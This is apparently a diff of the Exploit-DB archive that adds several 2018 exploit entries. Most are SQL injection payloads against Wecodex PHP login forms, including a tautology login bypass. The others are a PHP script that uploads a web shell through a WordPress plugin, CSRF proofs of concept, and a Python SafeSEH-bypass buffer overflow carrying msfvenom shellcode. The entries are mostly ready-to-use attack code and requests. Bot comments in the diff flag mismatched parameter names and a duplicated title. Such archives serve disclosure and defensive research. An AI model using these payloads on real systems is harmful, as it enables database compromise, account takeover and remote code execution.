application/x-www-form-urlencoded +Content-Length: 39 +email=admin%40admin.com&password=123456 + + +# Vulnerable Payload: +# Parameter: email (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +email=admin@admin.com" RLIKE (SELECT (CASE WHEN (7084=7084) +THEN 0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND +"eloY"="eloY&password=123456 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +email=admin@admin.com" AND (SELECT * FROM +(SELECT(SLEEP(5)))lzxm) AND "vZea"="vZea&password=123456 \ No newline at end of file 
diff --git a/exploits/php/webapps/44720.txt b/exploits/php/webapps/44720.txt new file mode 100644 index 000000000..3c75b27e4 --- /dev/null +++ b/exploits/php/webapps/44720.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: GPSTracker v1.0 - Login Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.wecodex.com +# https://codecanyon.net/item/gpstracker-gps-trackgin-system/21873663 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. + +==================================================== + +# PoC : SQLi : + + +http://test.com/fotracking/account/signin + +POST /fotracking/account/signin HTTP/1.1 +Host: 188.165.129.80 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://test.com/fotracking/login +Content-Length: 32 +Cookie: PHPSESSID=ikk8m7o6v54836u6a36sr6qko1 +Connection: keep-alive +id=democlient&password=test12345 + + +Vulnerable Payload : + +Parameter: id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=democlient' AND 8345=8345 AND +'jDLh'='jDLh&password=test12345 + + Type: stacked queries + Title: MySQL > 5.0.11 stacked queries (comment) + Payload: id=democlient';SELECT SLEEP(5)#&password=test12345 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: id=democlient' AND SLEEP(5) AND 'yGiF'='yGiF&password=test12345 + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44722.txt b/exploits/php/webapps/44722.txt new file mode 100644 index 000000000..158898440 
--- /dev/null +++ b/exploits/php/webapps/44722.txt @@ -0,0 +1,43 @@ +# Exploit Title: Shipping System CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/shipping-system-by-parcel-in-php-and-mysql/4 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target/demos/sendpack/admin/ + +https://Target/demos/sendpack/admin/index.php?action=processlogin + +POST /demos/sendpack/admin/index.php?action=processlogin HTTP/1.1 +Host: www.wecodex.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/sendpack/admin/ +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 30 +username=admin&password=123456 + + +# Vulnerable Payload : +# Parameter: username (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN +0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44725.txt b/exploits/php/webapps/44725.txt new file mode 100644 index 000000000..46f037e3c --- /dev/null +++ b/exploits/php/webapps/44725.txt 
@@ -0,0 +1,48 @@ +# Exploit Title: Wecodex Store Paypal 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.wecodex.com/item/view/online-store-system-with-paypal-sdk-in-php/9 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC : SQLi : +# Demo : https://Target + +https://Target/signIn + +POST /signIn HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://Target/login +Content-Length: 23 +Cookie: PHPSESSID=j89q1i6r4i1juosmihns9c1jo2 +Connection: keep-alive +id=admin&password=12345 + + +# Vulnerable Payload : +# Parameter: id (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +id=admin' AND 9071=9071 AND 'gneN'='gneN&password=12345 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: + +id=admin' OR SLEEP(5) AND 'gXNU'='gXNU&password=12345 \ No newline at end of file diff --git a/exploits/php/webapps/44726.txt b/exploits/php/webapps/44726.txt new file mode 100644 index 000000000..4b127e97d --- /dev/null +++ b/exploits/php/webapps/44726.txt 
@@ -0,0 +1,53 @@
+# Exploit Title: SAT CFDI 3.3 - SQL Injection
+# Dork: N/A
+# Date: 2018-05-23
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://www.wecodex.com/item/view/verification-and-validation-system-sat-cfdi-33/8
+# Version: 3.3
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# PoC : SQLi :
+# Demo : https://Target
+# https://Target/signIn
+
+POST /signIn HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: https://Target/
+Content-Length: 24
+Cookie: PHPSESSID=7knfo298eprq0la2r77ph31jr3
+Connection: keep-alive
+id=admin&password=123456
+
+
+# Vulnerable Payload :
+# Parameter: id (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload:
+
+id=admin" AND 3577=3577 AND "Stsj"="Stsj&password=123456
+
+# Type: stacked queries
+# Title: MySQL > 5.0.11 stacked queries (comment)
+# Payload:
+
+id=admin";SELECT SLEEP(5)#&password=123456
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload:
+
+id=admin" AND SLEEP(5) AND "bWUR"="bWUR&password=123456
\ No newline at end of file
diff --git a/exploits/php/webapps/44727.txt b/exploits/php/webapps/44727.txt
new file mode 100644
index 000000000..d55b8b4ad
--- /dev/null
+++ b/exploits/php/webapps/44727.txt
@@ -0,0 +1,49 @@
+# Exploit Title: School Management System CMS 1.0 - Admin Login SQL
+Injection
+# Dork: N/A
+# Date: 23.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor : Wecodex Solutions
+# Vendor Homepage: https://www.wecodex.com/item/view/school-management-system-in-php-and-mysql/5
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+because it fails to sufficiently sanitize user-supplied data before using
+it in an SQL query.Exploiting this issue could allow an attacker to
+compromise the application, access or modify data, or exploit latent
+vulnerabilities in the underlying database.
+
+====================================================
+
+# PoC : SQLi :
+
+https://test.com/school/maestro/index.php?view=processlogin
+
+POST /school/maestro/index.php?view=processlogin HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://test.com/school/maestro/
+Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+username=admin&password=123456
+
+
+Vulnerable Payload :
+
+Parameter: username (POST)
+Type: boolean-based blind
+Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+Payload: username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN
+0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456
+
+
+
+====================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/44728.txt b/exploits/php/webapps/44728.txt
new file mode 100644
index 000000000..c8b0b2c84
--- /dev/null
+++ b/exploits/php/webapps/44728.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Library CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 23.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor : Wecodex Solutions
+# Vendor Homepage: https://www.wecodex.com/item/view/library-management-system-in-php-and-mysql/1
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# PoC : SQLi :
+# Demo : https://Target/demos/library/admin/
+
+https://Target/demos/library/admin/index.php?action=processlogin
+
+POST /demos/library/admin/index.php?action=processlogin HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/demos/library/admin/
+Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+username=admin&password=123456
+
+
+# Vulnerable Payload :
+# Parameter: username (POST)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+username=admin") RLIKE (SELECT (CASE WHEN (5737=5737) THEN
+0x61646d696e ELSE 0x28 END)) AND ("YAQS"="YAQS&password=123456
\ No newline at end of file
diff --git a/exploits/php/webapps/44729.txt b/exploits/php/webapps/44729.txt
new file mode 100644
index 000000000..226a57c88
--- /dev/null
+++ b/exploits/php/webapps/44729.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Wecodex Hotel CMS 1.0 - 'Admin Login' SQL Injection
+# Dork: N/A
+# Date: 2018-05-23
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor : Wecodex Solutions
+# Vendor Homepage: https://www.wecodex.com/item/view/hotel-management-system-in-php-and-mysql/7
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# PoC : SQLi :
+# Demo : https://Target/demos/hotel/admin/
+
+https://Target/demos/hotel/admin/index.php?action=processlogin
+
+POST /demos/hotel/admin/index.php?action=processlogin HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/demos/hotel/admin/
+Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+username=admin&password=123456
+
+
+# Vulnerable Payload :
+# Parameter: email (POST)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+username=admin" RLIKE (SELECT (CASE WHEN (7084=7084) THEN
+0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND
+"eloY"="eloY&password=123456
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+username=admin" AND (SELECT * FROM (SELECT(SLEEP(5)))lzxm) AND
+"vZea"="vZea&password=123456
\ No newline at end of file
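Review bot: The `# Parameter: email (POST)` line does not match the request above it, whose body is `username=admin&password=123456` and whose payload lines also begin with `username=`. The hex literal in the first payload decodes to an e-mail address, so the block may have been taken from a different form than the one shown. As written, a reader cannot tell which field needs the fix or which field to look for in request logs; the entry should name one parameter consistently in the request, the `Parameter:` line and the payloads. 44730 has the same mismatch.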
diff --git a/exploits/php/webapps/44730.txt b/exploits/php/webapps/44730.txt
new file mode 100644
index 000000000..4ede62276
--- /dev/null
+++ b/exploits/php/webapps/44730.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Wecodex Restaurant CMS 1.0 - 'Login' SQL Injection
+# Dork: N/A
+# Date: 2018-05-23
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor : Wecodex Solutions
+# Vendor Homepage: https://www.wecodex.com/item/view/restaurant-system-in-php-and-mysql/6
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# PoC : SQLi :
+# Demo : https://Target/demos/restaurant/admin/
+
+https://Target/demos/restaurant/admin/index.php?action=processlogin
+
+POST /demos/restaurant/admin/index.php?action=processlogin HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/demos/restaurant/admin/
+Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+username=admin&password=123456
+
+
+# Vulnerable Payload :
+# Parameter: email (POST)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+username=admin" RLIKE (SELECT (CASE WHEN (7084=7084) THEN
+0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND
+"eloY"="eloY&password=123456
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+username=admin" AND (SELECT * FROM (SELECT(SLEEP(5)))lzxm) AND
+"vZea"="vZea&password=123456
\ No newline at end of file
diff --git a/exploits/php/webapps/44732.txt b/exploits/php/webapps/44732.txt new file mode 100644 index 000000000..02bb7ea87 --- /dev/null +++ b/exploits/php/webapps/44732.txt @@ -0,0 +1,29 @@ +# Exploit Title: eWallet - Online Payment Gateway 2 - Cross-Site Request Forgery +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/ewallet-online-payment-gateway/19316332?s_rank=1110 +# Version: 2 +# Tested on: Kali linux + +# POC : +# eWallet - Online Payment Gateway 2 suffers from csrf vulnerability . +# Attacker can send target account balance to his account . + +# Exploit : + + + + CSRF POC + + +
+ + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44733.txt b/exploits/php/webapps/44733.txt new file mode 100644 index 000000000..290e39dc9 --- /dev/null +++ b/exploits/php/webapps/44733.txt @@ -0,0 +1,12 @@ +# Exploit Title: # Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15 +# Version: 1 +# Tested on: Kali linux + +# POC 1 : + +# Attacker can bypass admin panel authentication +Username : ' OR 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44735.txt b/exploits/php/webapps/44735.txt new file mode 100644 index 000000000..3ebb2e152 --- /dev/null +++ b/exploits/php/webapps/44735.txt @@ -0,0 +1,121 @@ +# Title: NewsBee CMS 1.4 - Cross-Site Request Forgery +# Author: indoushka +# Tested on: windows 10 Français V.(Pro) +# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Dork: N/A + +# PoC + + +
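Review bot: The first line of 44733.txt repeats its label, `# Exploit Title: # Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection`, so anything that parses the header field would take the second label as part of the title. It should read `# Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection`. The entry also gives no remediation; the tautology-style login input it shows points to credentials being concatenated into the query, so a hedged line such as `# Mitigation: use a parameterized login query` would serve readers triaging from this file.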
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
 Tab PermissionComment ModerateNewEditDelete
News
Videosx
Galleryx
Adsx
Home Sliderx
FAQx
Categoriesx
Pagesx
+ + + + + + + +
+ +
+
+
+
+ \ No newline at end of file diff --git a/exploits/php/webapps/44737.txt b/exploits/php/webapps/44737.txt new file mode 100644 index 000000000..1c123cfa2 --- /dev/null +++ b/exploits/php/webapps/44737.txt @@ -0,0 +1,44 @@ +# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/ +# Date: 2018-05-23 +# Exploit Author: Mr.7z +# Vendor Homepage: - +# Software Link: - +# Version: 1.0 +# Tested on: Windows 10 64bit (Home Edition) + +# Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php +# Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} + +# CSRF + "@yourshell.jpg", +"name" => "yourshell.php" +); +$ch = curl_init ("$url"); +curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); +curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; +rv:32.0) Gecko/20100101 Firefox/32.0"); +curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); +curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); +curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); +curl_setopt ($ch, CURLOPT_POST, 1); +@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); +$data = curl_exec ($ch); +curl_close ($ch); +echo $data; + +?> + +# For CSRF using php xampp. +# Shell Locate: +target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php + +# Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - +# Typical Idiot Security [!] \ No newline at end of file diff --git a/exploits/windows/local/44713.py b/exploits/windows/local/44713.py new file mode 100755 index 000000000..65e4f9e2c --- /dev/null +++ b/exploits/windows/local/44713.py 
@@ -0,0 +1,74 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------# +# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) # +# Exploit Author : Hashim Jawad - @ihack4falafel # +# Vendor Homepage : http://www.ftpshell.com/ # +# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm # +# Tested on : Windows XP Professional SP3 # +# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass # +#----------------------------------------------------------------------------------------------------------# + +''' +Notes: +===== +* All loaded modules including base binary are compiled with /SAFESEH +* Null byte '\x00' get mangled by the program and end up as space '\x20' +''' + +#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "\x00\x0a\x0d" -f python -v shellcode +#Payload size: 447 bytes +shellcode = "" +shellcode += "\x89\xe0\xd9\xed\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a" +shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43" +shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41" +shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" +shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79" +shellcode += "\x6c\x7a\x48\x4c\x42\x67\x70\x73\x30\x57\x70\x43" +shellcode += "\x50\x4d\x59\x4b\x55\x36\x51\x59\x50\x61\x74\x4e" +shellcode += "\x6b\x56\x30\x46\x50\x6e\x6b\x61\x42\x56\x6c\x6c" +shellcode += "\x4b\x72\x72\x32\x34\x6e\x6b\x61\x62\x37\x58\x76" +shellcode += "\x6f\x38\x37\x72\x6a\x54\x66\x55\x61\x4b\x4f\x4e" +shellcode += "\x4c\x45\x6c\x30\x61\x71\x6c\x35\x52\x46\x4c\x45" +shellcode += "\x70\x6b\x71\x58\x4f\x44\x4d\x77\x71\x69\x57\x7a" +shellcode += "\x42\x6c\x32\x63\x62\x46\x37\x4e\x6b\x62\x72\x62" +shellcode += "\x30\x6e\x6b\x53\x7a\x47\x4c\x4c\x4b\x52\x6c\x74" +shellcode += "\x51\x52\x58\x6b\x53\x62\x68\x77\x71\x5a\x71\x62" +shellcode += 
"\x71\x4e\x6b\x76\x39\x57\x50\x36\x61\x4a\x73\x6e" +shellcode += "\x6b\x47\x39\x56\x78\x59\x73\x65\x6a\x52\x69\x6e" +shellcode += "\x6b\x57\x44\x6c\x4b\x67\x71\x4e\x36\x34\x71\x6b" +shellcode += "\x4f\x6e\x4c\x5a\x61\x58\x4f\x74\x4d\x76\x61\x4b" +shellcode += "\x77\x70\x38\x69\x70\x52\x55\x38\x76\x75\x53\x51" +shellcode += "\x6d\x59\x68\x65\x6b\x73\x4d\x65\x74\x43\x45\x78" +shellcode += "\x64\x61\x48\x6c\x4b\x36\x38\x67\x54\x76\x61\x49" +shellcode += "\x43\x73\x56\x4c\x4b\x76\x6c\x50\x4b\x6e\x6b\x31" +shellcode += "\x48\x77\x6c\x43\x31\x79\x43\x6e\x6b\x43\x34\x4c" +shellcode += "\x4b\x53\x31\x7a\x70\x4d\x59\x37\x34\x66\x44\x67" +shellcode += "\x54\x33\x6b\x53\x6b\x50\x61\x30\x59\x31\x4a\x63" +shellcode += "\x61\x69\x6f\x59\x70\x71\x4f\x51\x4f\x33\x6a\x6e" +shellcode += "\x6b\x76\x72\x6a\x4b\x6e\x6d\x33\x6d\x43\x5a\x63" +shellcode += "\x31\x6c\x4d\x6c\x45\x4c\x72\x47\x70\x45\x50\x33" +shellcode += "\x30\x56\x30\x53\x58\x74\x71\x4e\x6b\x62\x4f\x4f" +shellcode += "\x77\x59\x6f\x6b\x65\x6f\x4b\x4c\x30\x4f\x45\x6d" +shellcode += "\x72\x43\x66\x62\x48\x39\x36\x6a\x35\x6f\x4d\x4d" +shellcode += "\x4d\x59\x6f\x5a\x75\x47\x4c\x53\x36\x63\x4c\x55" +shellcode += "\x5a\x4f\x70\x49\x6b\x6d\x30\x31\x65\x53\x35\x6d" +shellcode += "\x6b\x62\x67\x37\x63\x30\x72\x62\x4f\x32\x4a\x55" +shellcode += "\x50\x70\x53\x79\x6f\x6e\x35\x31\x73\x71\x71\x30" +shellcode += "\x6c\x71\x73\x46\x4e\x43\x55\x51\x68\x35\x35\x35" +shellcode += "\x50\x41\x41" + +buffer = '\xcc' * 2101 # filler to nSEH offset +buffer += '\xeb\x06\x90\x90' # nSEH | hop over SEH +buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass] +buffer += '\x90' * 10 # nops sled +buffer += shellcode # calc.exe +buffer += '\xcc' * (5000-2101-4-4-10-len(shellcode)) + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file 
diff --git a/exploits/windows_x86/dos/44717.txt b/exploits/windows_x86/dos/44717.txt new file mode 100644 index 000000000..cde7b7c2c --- /dev/null +++ b/exploits/windows_x86/dos/44717.txt @@ -0,0 +1,20 @@ +# Exploit Title: FTPShell Server 6.80 - Local Denial of Service +# Exploit Author: Hashim Jawad +# Date: 2018-05-23 +# Vendor Homepage: http://www.ftpshell.com/ +# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm +# Tested on: Windows 7 Enterprise - SP1 (x86) +# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field + +#!/usr/bin/python + +buffer = '\x41' * 2500 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 70e094804..a036a2a4d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5485,7 +5485,7 @@ id,file,description,date,author,type,platform,port 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows, 43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, 43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, -43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, +43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows, 43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333 43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash (PoC)",2018-02-07,"Sean Dillon",dos,hardware, 
@@ -5902,7 +5902,7 @@ id,file,description,date,author,type,platform,port 44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple, 44264,exploits/linux/dos/44264.c,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)",2018-03-05,anonymous,dos,linux,11211 44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211 -44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android, +44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android, 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows, 44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android, 44301,exploits/linux/dos/44301.c,"Linux Kernel < 4.5.1 - Off-By-One (PoC)",2016-10-16,"Vitaly Nikolenko",dos,linux, 
